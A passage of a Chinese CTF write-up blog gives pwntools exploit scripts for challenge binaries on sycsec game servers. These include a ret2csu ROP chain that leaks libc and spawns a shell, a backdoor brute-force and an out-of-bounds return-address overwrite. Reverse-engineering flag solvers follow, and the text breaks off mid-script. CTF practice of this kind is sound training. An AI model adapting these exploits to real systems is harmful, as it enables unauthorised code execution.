class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#coding:utf-8</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-comment"># from LibcSearcher import*</span><br><span class="hljs-comment"># sh = process('./chal')</span><br>sh = remote(<span class="hljs-string">'pwn.node.game.sycsec.com'</span>,<span class="hljs-number">31971</span>)<br>elf = ELF(<span class="hljs-string">'./chal'</span>)<br><span class="hljs-comment"># libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')</span><br><span class="hljs-comment"># libc = ELF('../../tools/libc-database/db/libc6_2.23-0ubuntu10_amd64.so')</span><br>libc = ELF(<span class="hljs-string">'libc.so.6'</span>)<br>context(arch=<span class="hljs-string">'amd64'</span>, os=<span class="hljs-string">'linux'</span>)<br>context.log_level = <span class="hljs-string">'DEBUG'</span><br><span class="hljs-comment"># context.terminal = ['tmux','splitw','-h']</span><br>gadgets1 = <span class="hljs-number">0x000000000040132A</span><br>gadgets2 = <span class="hljs-number">0x0000000000401310</span><br>write_got = elf.got[<span class="hljs-string">'write'</span>]<br>main_addr = elf.symbols[<span class="hljs-string">'main'</span>]<br>offset = <span class="hljs-string">b'\0'</span>*(<span class="hljs-number">0x10</span>+<span class="hljs-number">8</span>)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">csu</span>(<span class="hljs-params">r12,r13,r14,r15,ret_addr</span>):<br> payload = offset<br> payload += p64(gadgets1)<br> <span class="hljs-comment"># payload += b"\0"*8</span><br> payload += p64(<span class="hljs-number">0</span>)<br> payload += p64(<span class="hljs-number">1</span>)<br> payload += p64(r12)<br> payload += p64(r15)<br> payload += p64(r14)<br> payload += p64(r13)<br> payload += p64(gadgets2) <br> payload += <span class="hljs-string">b"\0"</span>*<span class="hljs-number">56</span><br> payload += p64(ret_addr)<br> sh.sendline(payload)<br><span class="hljs-comment"># sh.recvuntil("this\n")</span><br>csu(<span class="hljs-number">1</span>,write_got,<span class="hljs-number">8</span>,write_got,main_addr)<br>write_addr = u64(sh.recvuntil(<span class="hljs-string">b'\x7f'</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b'\0'</span>))<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(write_addr))<br>offset_addr = write_addr - libc.symbols[<span class="hljs-string">'write'</span>]<br>success(<span class="hljs-string">"offset_addr = 0x%x"</span>,offset_addr)<br><span class="hljs-comment"># libc = LibcSearcher('write',write_addr)</span><br><span class="hljs-comment"># base = write_addr - libc.dump('write')</span><br><span class="hljs-comment"># system = base + libc.dump('system')</span><br><span class="hljs-comment"># binsh = base + libc.dump('str_bin_sh')</span><br><span class="hljs-comment"># print("123"+libc.dump('str_bin_sh'))</span><br>system_addr = offset_addr + libc.symbols[<span class="hljs-string">'system'</span>]<br><span class="hljs-built_in">print</span>(<span class="hljs-string">"execve:"</span>,<span class="hljs-built_in">hex</span>(system_addr))<br>binsh_address = <span class="hljs-built_in">next</span>(libc.search(<span class="hljs-string">b'/bin/sh\x00'</span>))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">"binsh:"</span>,<span class="hljs-built_in">hex</span>(binsh_address))<br><span class="hljs-comment">#gdb.attach(sh)</span><br>sh.recvuntil(<span class="hljs-string">"this\n"</span>)<br>payload = offset<br>payload+= p64(<span class="hljs-number">0x000000000040101a</span>)<span class="hljs-comment">#ret_addr</span><br>payload+= p64(<span class="hljs-number">0x0000000000401333</span>)<span class="hljs-comment"># pop_rdi_ret</span><br>payload+= p64(offset_addr+binsh_address)<br>payload+= p64(system_addr)<br>sh.sendline(payload)<br>sh.interactive()<br></code></pre></td></tr></table></figure><h2 id="password"><a href="#password" class="headerlink" title="password"></a>password</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context.log_level = <span class="hljs-string">'debug'</span><br><br><span class="hljs-comment"># context.terminal = ['gnome-terminal', '-x', 'sh', '-c']</span><br><span class="hljs-comment"># p = gdb.debug('./password')</span><br><span class="hljs-comment"># p = process('./password')</span><br><br>p = remote(<span class="hljs-string">'pwn.node.game.sycsec.com'</span>,<span class="hljs-number">31300</span>)<br><br><span class="hljs-comment"># res = b'wrong'</span><br>ret = <span class="hljs-number">0x000000000040101a</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1000</span>):<br> p = remote(<span class="hljs-string">'pwn.node.game.sycsec.com'</span>,<span class="hljs-number">31300</span>)<br> <span class="hljs-comment"># p = process('./password')</span><br> pad = <span class="hljs-string">b'\0'</span>*<span class="hljs-number">0x28</span><br> backdoor = p64(<span class="hljs-number">0x4012F3</span>)<br> pl1 = pad + backdoor<br> p.send(pl1)<br> p.recvuntil(<span class="hljs-string">b'password:\n'</span>)<br> p.sendline(<span class="hljs-string">b'\x00'</span>)<br> res = p.recvline()<br> <span class="hljs-keyword">if</span> <span class="hljs-string">b'Correct'</span> <span class="hljs-keyword">in</span> res:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">'ok'</span>)<br> <span class="hljs-keyword">break</span><br>p.interactive()<br><span class="hljs-comment"># res = b'wrong'</span><br><span class="hljs-comment"># while b'wrong' in res:</span><br><span class="hljs-comment"># p = process('./password')</span><br><span class="hljs-comment"># pad = b'a'*0x20</span><br><span class="hljs-comment"># backdoor = p64(0x4012F3)</span><br><span class="hljs-comment"># pl1 = pad + backdoor</span><br><span class="hljs-comment"># p.sendline(pl1)</span><br><span class="hljs-comment"># p.recvuntil('password:')</span><br><span class="hljs-comment"># p.sendline(b'')</span><br><span class="hljs-comment"># res = p.recvall()</span><br><br></code></pre></td></tr></table></figure><h2 id="write1"><a href="#write1" class="headerlink" title="write1"></a>write1</h2><p>[<a href="https://blog.csdn.net/mcmuyanga/article/details/114673240">BUUCTF]PWN——wustctf2020_name_your_cat(数组越界)_pwn ctf 越界写-CSDN博客</a></p><p>这个题目和我们做的才差不多,都是通过数据越界然后修改地址,但要注意数组是一个字节一个字节的,这个题目是8个字节8个字节的,所以可以直接使用p64(地址)</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs c">*(v2 + v1) += tmp;<br></code></pre></td></tr></table></figure><p>这个关键的语句,不是=,所以不是覆盖,我们要输入数值,然后让这个地址加减数值,让他等于我们的返回地址</p><p>我们gdb动调一下,可以看到我们输入下表位41,然后值为-1的时候,他的返回地址从40134D变成了40124D,这就是我们这个的目的,我们要把他变成我们的返回地址</p><p><img src="C:\Users\a\AppData\Roaming\Typora\typora-user-images\image-20231029221238038.png" alt="image-20231029221238038"></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context.log_level = <span class="hljs-string">'debug'</span><br>context(arch=<span class="hljs-string">'amd64'</span>, os=<span class="hljs-string">'linux'</span>)<br><span class="hljs-comment"># p=process('chal')</span><br>p=remote(<span class="hljs-string">'pwn.node.game.sycsec.com'</span>,<span class="hljs-number">31277</span>)<br><span class="hljs-comment"># p=gdb.debug('./chal')</span><br><span class="hljs-comment"># p=remote("node3.buuoj.cn",28477)</span><br><span class="hljs-comment">#p=process('./wustctf2020_name_your_cat')</span><br><span class="hljs-comment"># elf=ELF('./wustctf2020_name_your_cat')</span><br><br>shell_addr=<span class="hljs-number">0x401221</span><br><br>p.sendline(<span class="hljs-string">b'aaaaaaaaaaa'</span>)<br><br>p.sendlineafter(<span class="hljs-string">'index:\n'</span>,<span class="hljs-string">b'41'</span>)<br>p.sendlineafter(<span class="hljs-string">"value:"</span>,<span class="hljs-string">b'-1'</span>)<br><br>p.sendlineafter(<span class="hljs-string">'index:\n'</span>,<span class="hljs-string">b'40'</span>)<br>p.sendlineafter(<span class="hljs-string">"value:"</span>,<span class="hljs-string">b'-2b'</span>)<br><br>p.sendlineafter(<span class="hljs-string">'index:\n'</span>,<span class="hljs-string">b'-1'</span>)<br><br><br>p.interactive()<br><br></code></pre></td></tr></table></figure><h1 id="re"><a href="#re" class="headerlink" title="re"></a>re</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs python">a=<span class="hljs-string">"Z`J[X^LMNO`PPJPVQRSIUTJ]IMNOZKMM"</span><br>a=<span class="hljs-built_in">list</span>(a)<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(a)):<br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(<span class="hljs-built_in">ord</span>(a[i])-<span class="hljs-number">7</span>),end=<span class="hljs-string">''</span>)<br></code></pre></td></tr></table></figure><h2 id="砍树"><a href="#砍树" class="headerlink" title="砍树"></a>砍树</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs python">enc =[<br> <span class="hljs-number">0x00</span>, <span class="hljs-number">0x20</span>, <span class="hljs-number">0x20</span>, <span class="hljs-number">0x17</span>, <span class="hljs-number">0x1B</span>, <span class="hljs-number">0x36</span>, <span class="hljs-number">0x0E</span>, <span class="hljs-number">0x36</span>, <span class="hljs-number">0x26</span>, <span class="hljs-number">0x17</span>, <br> <span class="hljs-number">0x04</span>, <span class="hljs-number">0x2A</span>, <span class="hljs-number">0x29</span>, <span class="hljs-number">0x07</span>, <span class="hljs-number">0x26</span>, <span class="hljs-number">0x15</span>, <span class="hljs-number">0x52</span>, <span class="hljs-number">0x33</span>, <span class="hljs-number">0x2D</span>, <span class="hljs-number">0x0F</span>, <br> <span class="hljs-number">0x3A</span>, <span class="hljs-number">0x27</span>, <span class="hljs-number">0x11</span>, <span class="hljs-number">0x06</span>, <span class="hljs-number">0x33</span>, <span class="hljs-number">0x07</span>, <span class="hljs-number">0x46</span>, <span class="hljs-number">0x17</span>, <span class="hljs-number">0x3D</span>, <span class="hljs-number">0x0A</span>, <br> <span class="hljs-number">0x3C</span>, <span class="hljs-number">0x38</span>, <span class="hljs-number">0x2E</span>, <span class="hljs-number">0x22</span>, <span class="hljs-number">0x18</span><br>]<br><br>key = <span class="hljs-string">"Sycloverforerver"</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(enc)):<br> enc[i]=enc[i]^<span class="hljs-built_in">ord</span>(key[i%<span class="hljs-built_in">len</span>(key)])<br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(<span class="hljs-built_in">int</span>(enc[i])),end=<span class="hljs-string">''</span>)<br><br><span class="hljs-comment"># print(0x1B^ord('{'))</span><br></code></pre></td></tr></table></figure><h2 id="听说cpp很难?"><a href="#听说cpp很难?" class="headerlink" title="听说cpp很难?"></a>听说cpp很难?</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs python">a=[<span class="hljs-number">77</span>, <span class="hljs-number">95</span>, <span class="hljs-number">61</span>, <span class="hljs-number">55</span>, <span class="hljs-number">104</span>, <span class="hljs-number">115</span>, <span class="hljs-number">87</span>, <span class="hljs-number">39</span>, <span class="hljs-number">104</span>, <span class="hljs-number">81</span>, <span class="hljs-number">89</span>, <span class="hljs-number">127</span>, <span class="hljs-number">38</span>, <span class="hljs-number">107</span>, <span class="hljs-number">89</span>, <span class="hljs-number">115</span>, <span class="hljs-number">87</span>, <span class="hljs-number">85</span>, <span class="hljs-number">91</span>, <span class="hljs-number">89</span>, <span class="hljs-number">111</span>, <span class="hljs-number">106</span>, <span class="hljs-number">89</span>, <span class="hljs-number">39</span>, <span class="hljs-number">87</span>, <span class="hljs-number">114</span>, <span class="hljs-number">87</span>, <span class="hljs-number">79</span>, <span class="hljs-number">87</span>, <span class="hljs-number">120</span>, <span class="hljs-number">120</span>]<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(a)):<br> a[i]=((a[i]+<span class="hljs-number">10</span>)^<span class="hljs-number">10</span>)-<span class="hljs-number">10</span><br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(a[i]),end=<span class="hljs-string">''</span>)<br><br><span class="hljs-comment"># print((71^ 10)-10)</span><br></code></pre></td></tr></table></figure><h2 id="rainbow"><a href="#rainbow" class="headerlink" title="rainbow"></a>rainbow</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python">ida_chars =[<br> <span class="hljs-number">0x65</span>, <span class="hljs-number">0x58</span>, <span class="hljs-number">0x41</span>, <span class="hljs-number">0x8E</span>, <span class="hljs-number">0x50</span>, <span class="hljs-number">0x44</span>, <span class="hljs-number">0x7B</span>, <span class="hljs-number">0x62</span>, <span class="hljs-number">0x57</span>, <span class="hljs-number">0x4A</span>, <br> <span class="hljs-number">0x7E</span>, <span class="hljs-number">0x54</span>, <span class="hljs-number">0x49</span>, <span class="hljs-number">0x6C</span>, <span class="hljs-number">0x7D</span>, <span class="hljs-number">0x84</span>, <span class="hljs-number">0x4F</span>, <span class="hljs-number">0x5B</span>, <span class="hljs-number">0x95</span>, <span class="hljs-number">0x60</span>, <br> <span class="hljs-number">0x60</span>, <span class="hljs-number">0x64</span>, <span class="hljs-number">0x77</span>, <span class="hljs-number">0x48</span>, <span class="hljs-number">0x7D</span>, <span class="hljs-number">0x4D</span>, <span class="hljs-number">0x7B</span>, <span class="hljs-number">0x9F</span>, <span class="hljs-number">0x68</span>, <span class="hljs-number">0x3C</span>, <br> <span class="hljs-number">0x2D</span>, <span class="hljs-number">0x62</span><br>]<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(ida_chars)):<br> ida_chars[i]^=i<br> <span class="hljs-comment"># print(chr(ida_chars[i]),end='')</span><br><span class="hljs-comment"># q=1</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(ida_chars)):<br> <span class="hljs-keyword">if</span>(i%<span class="hljs-number">3</span>==<span class="hljs-number">0</span>):<br> ida_chars[i]-=<span class="hljs-number">18</span><br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(ida_chars[i]),end=<span class="hljs-string">''</span>)<br></code></pre></td></tr></table></figure><h2 id="小黄鸭"><a href="#小黄鸭" class="headerlink" title="小黄鸭"></a>小黄鸭</h2><p>直接爆破,有个坑点原题目中</p><p>if chr(ord(a[1])) != ‘s’ or ord(a[2]) != 109 or chr(ord(a[17])) != ‘C’:</p><p>意思其实就是告诉我们倒数第三个数是m,服了</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span><span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span><span class="hljs-string"><string.h></span></span><br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span><br>{<br><span class="hljs-type">char</span> a[] = { <span class="hljs-string">'H'</span>, <span class="hljs-string">'N'</span>, <span class="hljs-string">'R'</span>, <span class="hljs-string">'|'</span>, <span class="hljs-string">'2'</span>, <span class="hljs-string">'`'</span>, <span class="hljs-string">'w'</span>, <span class="hljs-string">'1'</span>, <span class="hljs-string">'e'</span>, <span class="hljs-string">'t'</span>, <span class="hljs-string">'`'</span>, <span class="hljs-string">'n'</span>, <span class="hljs-string">'D'</span>, <span class="hljs-string">'j'</span>, <span class="hljs-string">'`'</span>, <span class="hljs-string">'R'</span>, <span class="hljs-string">'w'</span>, <span class="hljs-string">'P'</span>, <span class="hljs-string">'h'</span>, <span class="hljs-string">'t'</span>, <span class="hljs-string">'`'</span>, <span class="hljs-string">'N'</span>, <span class="hljs-string">'d'</span>, <span class="hljs-string">'J'</span>, <span class="hljs-string">'g'</span>, <span class="hljs-string">'`'</span>, <span class="hljs-string">'s'</span>, <span class="hljs-string">'g'</span>, <span class="hljs-string">'4'</span>, <span class="hljs-string">'p'</span>, <span class="hljs-string">'|'</span>, <span class="hljs-string">'h'</span>, <span class="hljs-string">'~'</span> };<br><span class="hljs-type">int</span> i, j, k;<br><span class="hljs-keyword">for</span>(i=<span class="hljs-number">0</span>;i< <span class="hljs-number">33</span>;i++)<br><span class="hljs-keyword">for</span> (k = <span class="hljs-number">32</span>; k < <span class="hljs-number">127</span>; k++)<br>{<br>j = k;<br><span class="hljs-keyword">if</span> (j >= <span class="hljs-string">'a'</span> && j <= <span class="hljs-string">'z'</span>)<br>{<br>j += <span class="hljs-number">13</span>;<br><span class="hljs-keyword">if</span> (j <= <span class="hljs-string">'a'</span> || j >= <span class="hljs-string">'z'</span>)<br>j -= <span class="hljs-number">26</span>;<br>j += <span class="hljs-number">2</span>;<br>}<br><span class="hljs-keyword">else</span><br>{<br><span class="hljs-keyword">if</span> (j >= <span class="hljs-string">'A'</span> && j <= <span class="hljs-string">'Z'</span>)<br>{<br>j += <span class="hljs-number">13</span>;<br><span class="hljs-keyword">if</span> (j <= <span class="hljs-string">'A'</span> || j >= <span class="hljs-string">'Z'</span>)<br>j -= <span class="hljs-number">26</span>;<br>j += <span class="hljs-number">2</span>;<br>}<br><span class="hljs-keyword">else</span><br>{<br>j += <span class="hljs-number">1</span>;<br>}<br><br>}<br><span class="hljs-keyword">if</span> (j == a[i])<br>{<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"%c"</span>, k);<br>}<br>}<br><span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></table></figure><h2 id="flower-or-tea"><a href="#flower-or-tea" class="headerlink" title="flower-or-tea"></a>flower-or-tea</h2><p><a href="https://g2uge.github.io/2022/02/28/TEA%E7%B3%BB%E5%88%97%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86/">TEA系列加密解密 | Gruge’s Blog (g2uge.github.io)</a></p><p>第一次真正的接触tea加密,了解了tea,xtea和xxtea加密的特征</p><p>这个题的坑点一是,他的数据接收是从前从后往中间聚集,其实这个无所谓,直接解出flag后面自己改就好了</p><p>坑点二,这是一个xtea,他修改了常量和循环次数,其实这俩也是套脚本稍微一改就可以了</p><p>坑点三,原加密函数,中(*(key + 4 * ((sum >> 11) & 3)),中的4其实是混淆用的,因为他是取的地址,所以我们可以使用这个代替</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-built_in">int</span> __cdecl tea(unsigned <span class="hljs-built_in">int</span> a1, unsigned <span class="hljs-built_in">int</span> *enc, <span class="hljs-built_in">int</span> key)<br>{<br> <span class="hljs-built_in">int</span> result; // eax<br> unsigned <span class="hljs-built_in">int</span> i; // [esp+8h] [ebp-10h]<br> unsigned <span class="hljs-built_in">int</span> v1; // [esp+Ch] [ebp-Ch]<br> unsigned <span class="hljs-built_in">int</span> v0; // [esp+10h] [ebp-8h]<br> unsigned <span class="hljs-built_in">int</span> <span class="hljs-built_in">sum</span>; // [esp+14h] [ebp-4h]<br><br> v0 = *enc;<br> v1 = enc[<span class="hljs-number">1</span>];<br> <span class="hljs-built_in">sum</span> = <span class="hljs-number">0</span>;<br> <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i < a1; ++i )<br> {<br> v1 += <span class="hljs-built_in">sum</span> ^ (*(key + <span class="hljs-number">4</span> * ((<span class="hljs-built_in">sum</span> >> <span class="hljs-number">11</span>) & <span class="hljs-number">3</span>)) + <span class="hljs-built_in">sum</span>) ^ (v0 + ((v0 >> <span class="hljs-number">5</span>) ^ (<span class="hljs-number">16</span> * v0)));<br> v0 += (*(key + <span class="hljs-number">4</span> * (<span class="hljs-built_in">sum</span> & <span class="hljs-number">3</span>)) + <span class="hljs-built_in">sum</span>) ^ (v1 + ((v1 >> <span class="hljs-number">5</span>) ^ (<span class="hljs-number">16</span> * v1)));<br> <span class="hljs-built_in">sum</span> += <span class="hljs-number">0x31415927</span>;<br> }<br> *enc = v0;<br> result = <span class="hljs-number">4</span>;<br> enc[<span class="hljs-number">1</span>] = v1;<br> <span class="hljs-keyword">return</span> result;<br>}<br></code></pre></td></tr></table></figure><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python">v1 += (((v0 << <span class="hljs-number">4</span>) ^ (v0 >> <span class="hljs-number">5</span>)) + v0) ^ ((<span class="hljs-built_in">sum</span> + key[ ((<span class="hljs-built_in">sum</span> >> <span class="hljs-number">11</span>) & <span class="hljs-number">3</span>)])^<span class="hljs-built_in">sum</span>);<br>v0 += (((v1 << <span class="hljs-number">4</span>) ^ (v1 >> <span class="hljs-number">5</span>)) + v1) ^ (<span class="hljs-built_in">sum</span> + key[(<span class="hljs-built_in">sum</span> & <span class="hljs-number">3</span>)]);<br></code></pre></td></tr></table></figure><p>坑点四,解密代码记得按照逻辑把代码都取反</p><p>解密脚本:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdint.h></span></span><br><br><span class="hljs-comment">/* take 64 bits of data in v[0] and v[1] and 128 bits of key[0] - key[3] */</span><br><br><span class="hljs-type">void</span> <span class="hljs-title function_">encipher</span><span class="hljs-params">(<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> num_rounds, <span class="hljs-type">uint32_t</span> v[<span class="hljs-number">2</span>], <span class="hljs-type">uint32_t</span> <span class="hljs-type">const</span> key[<span class="hljs-number">4</span>])</span> {<br> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> i;<br> <span class="hljs-type">uint32_t</span> v0 = v[<span class="hljs-number">0</span>], v1 = v[<span class="hljs-number">1</span>], sum = <span class="hljs-number">0</span>, delta = <span class="hljs-number">0x31415927</span>;<br> <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i < num_rounds; i++) {<br> v1 += (((v0 << <span class="hljs-number">4</span>) ^ (v0 >> <span class="hljs-number">5</span>)) + v0) ^ ((sum + key[ ((sum >> <span class="hljs-number">11</span>) & <span class="hljs-number">3</span>)])^sum);<br> v0 += (((v1 << <span class="hljs-number">4</span>) ^ (v1 >> <span class="hljs-number">5</span>)) + v1) ^ (sum + key[(sum & <span class="hljs-number">3</span>)]);<br> sum += delta;<br> }<br> v[<span class="hljs-number">0</span>] = v0; v[<span class="hljs-number">1</span>] = v1;<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"加密后的数据:%u %u\n"</span>, v[<span class="hljs-number">0</span>], v[<span class="hljs-number">1</span>]);<br>}<br><br><span class="hljs-type">void</span> <span class="hljs-title function_">decipher</span><span class="hljs-params">(<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> num_rounds, <span class="hljs-type">uint32_t</span> v[<span class="hljs-number">2</span>], <span class="hljs-type">uint32_t</span> <span class="hljs-type">const</span> key[<span class="hljs-number">4</span>])</span> {<br> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> i;<br> <span class="hljs-type">uint32_t</span> v0 = v[<span class="hljs-number">0</span>], v1 = v[<span class="hljs-number">1</span>], delta = <span class="hljs-number">0x31415927</span>, sum = delta * num_rounds;<br> <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i < num_rounds; i++) {<br> sum -= delta;<br> v0 -= (((v1 << <span 